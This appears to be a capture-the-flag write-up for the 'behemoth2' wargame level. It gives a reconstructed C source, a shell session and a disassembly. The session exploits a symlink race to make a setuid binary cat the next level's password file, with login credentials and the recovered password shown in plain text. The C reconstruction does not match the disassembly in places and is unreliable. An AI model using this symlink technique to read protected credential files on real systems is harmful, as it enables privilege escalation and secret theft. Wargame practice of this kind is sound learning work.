behemoth - 02

#include <stdio.h>#include <unistd.h>#include <sys/stat.h>int main(int argc, char *argv[]){struct stat filestat;char cmd[16];char *ptrpid = cmd + 6;pid_t pid;pid = getpid();sprintf(cmd, "touch %d", pid);if (lstat(ptrpid, &filestat) & 0xf000 != 0x8000) {unlink(ptrpid);system(cmd);}sleep(2000);*(int *)cmd = 0x20746163; /* "cat " */cmd[5] = '\0';cmd[5] = ' ';system(cmd);return 0;}


栈环境 (stack environment: the exploitation session, then the disassembly of main())



root@today:~# ssh behemoth2@178.79.134.250
behemoth2@178.79.134.250's password: eimahquuof
behemoth2@melinda:~$ cd /tmp/shui2
behemoth2@melinda:/tmp/shui2$ ls
behemoth2@melinda:/tmp/shui2$ /behemoth/behemoth2 > passs.txt &
[1] 32634
behemoth2@melinda:/tmp/shui2$ ls
32634  passs.txt
behemoth2@melinda:/tmp/shui2$ rm -f 32634
behemoth2@melinda:/tmp/shui2$ ln -sf /etc/behemoth_pass/behemoth3 32634
behemoth2@melinda:/tmp/shui2$ ll
total 1692
drwxrwxr-x    2 behemoth2 behemoth2    4096 Feb 18 04:52 ./
drwxrwx-wt 9354 root      root      1724416 Feb 18 04:52 ../
lrwxrwxrwx    1 behemoth2 behemoth2      28 Feb 18 04:52 32634 -> /etc/behemoth_pass/behemoth3
-rw-rw-r--    1 behemoth2 behemoth2       0 Feb 18 04:51 passs.txt
behemoth2@melinda:/tmp/shui2$ ./sleep.sh
...
sleep 2409 sec.
sleep 2410 sec.
sleep 2411 sec.
^C
[1]+  Done                    /behemoth/behemoth2 > passs.txt
behemoth2@melinda:/tmp/shui2$ ls
32634  passs.txt  sleep.sh
behemoth2@melinda:/tmp/shui2$ cat passs.txt
nieteidiel



0x804856d <main>        push   %ebp
0x804856e <main+1>      mov    %esp,%ebp
0x8048570 <main+3>      and    $0xfffffff0,%esp
0x8048573 <main+6>      sub    $0xa0,%esp
0x8048579 <main+12>     mov    %gs:0x14,%eax
0x804857f <main+18>     mov    %eax,0x9c(%esp)
0x8048586 <main+25>     xor    %eax,%eax
0x8048588 <main+27>     call   0x8048410 <getpid@plt>
0x804858d <main+32>     mov    %eax,0x1c(%esp)
0x8048591 <main+36>     lea    0x24(%esp),%eax
0x8048595 <main+40>     add    $0x6,%eax
0x8048598 <main+43>     mov    %eax,0x20(%esp)
0x804859c <main+47>     mov    0x1c(%esp),%eax
0x80485a0 <main+51>     mov    %eax,0x8(%esp)
0x80485a4 <main+55>     movl   $0x804870c,0x4(%esp)
0x80485ac <main+63>     lea    0x24(%esp),%eax
0x80485b0 <main+67>     mov    %eax,(%esp)
0x80485b3 <main+70>     call   0x8048450 <sprintf@plt>
0x80485b8 <main+75>     lea    0x38(%esp),%eax
0x80485bc <main+79>     mov    %eax,0x4(%esp)
0x80485c0 <main+83>     mov    0x20(%esp),%eax
0x80485c4 <main+87>     mov    %eax,(%esp)
0x80485c7 <main+90>     call   0x80486c0 <lstat>
0x80485cc <main+95>     and    $0xf000,%eax
0x80485d1 <main+100>    cmp    $0x8000,%eax
0x80485d6 <main+105>    je     0x80485f0 <main+131>
0x80485d8 <main+107>    mov    0x20(%esp),%eax
0x80485dc <main+111>    mov    %eax,(%esp)
0x80485df <main+114>    call   0x8048400 <unlink@plt>
0x80485e4 <main+119>    lea    0x24(%esp),%eax
0x80485e8 <main+123>    mov    %eax,(%esp)
0x80485eb <main+126>    call   0x8048420 <system@plt>
0x80485f0 <main+131>    movl   $0x7d0,(%esp)
0x80485f7 <main+138>    call   0x80483e0 <sleep@plt>
0x80485fc <main+143>    lea    0x24(%esp),%eax
0x8048600 <main+147>    movl   $0x20746163,(%eax)
0x8048606 <main+153>    movb   $0x0,0x4(%eax)
0x804860a <main+157>    movb   $0x20,0x28(%esp)
0x804860f <main+162>    lea    0x24(%esp),%eax
0x8048613 <main+166>    mov    %eax,(%esp)
0x8048616 <main+169>    call   0x8048420 <system@plt>
0x804861b <main+174>    mov    $0x0,%eax
0x8048620 <main+179>    mov    0x9c(%esp),%edx
0x8048627 <main+186>    xor    %gs:0x14,%edx
0x804862e <main+193>    je     0x8048635 <main+200>
0x8048630 <main+195>    call   0x80483f0 <__stack_chk_fail@plt>
0x8048635 <main+200>    leave
0x8048636 <main+201>    ret

